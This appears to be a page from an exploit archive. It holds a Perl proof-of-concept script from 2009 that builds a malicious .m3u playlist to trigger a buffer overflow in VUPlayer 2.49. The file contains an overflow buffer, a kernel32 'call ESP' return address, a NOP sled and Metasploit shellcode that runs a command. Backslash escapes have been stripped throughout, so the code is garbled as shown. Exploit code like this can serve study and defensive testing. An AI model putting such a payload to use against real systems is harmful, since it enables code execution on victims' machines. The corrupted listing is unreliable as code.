VUPlayer 2.49 (.wax File) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VUPlayer 2.49 (.wax File) Local Buffer Overflow Exploit
# Published : 2009-01-05
# Author : Houssamix
# Previous Title : Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit
# Next Title : Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit

#!/usr/bin/perl -w

# Author : Houssamix
# Download :  http://vuplayer.com/files/vuplayersetup.exe
# tested in windows pro Sp 2 (french)

# -- Viva Gazza -- Viva Palestine --

print "===================================================================== n";
print "Author : Houssamix 						     n";
print "===================================================================== n";
print "VUPlayer v2.49 ( .wax file ) Local buffer overflow Exploit 	     n";
print "file can be exploited :  (.wax)(.m3u)(.pls) 			     n";	
print "===================================================================== nn";


my $overflow = "x41" x 1012;
my $ret = "x5Dx38x82x7C"; #call ESP from kernel32.dll       0x7C82385D
my $nop = "x90" x 4;

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
"x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
"x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
"x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
"x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
"x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
"x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
"x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
"x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
"x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";


my $file="hsmx.m3u";

$exploit = $overflow.$ret.$nop.$shellcode;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;


close($FILE);
print "$file has been created open it with vuplayer 2.49n";

# www.Syue.com [2009-01-05]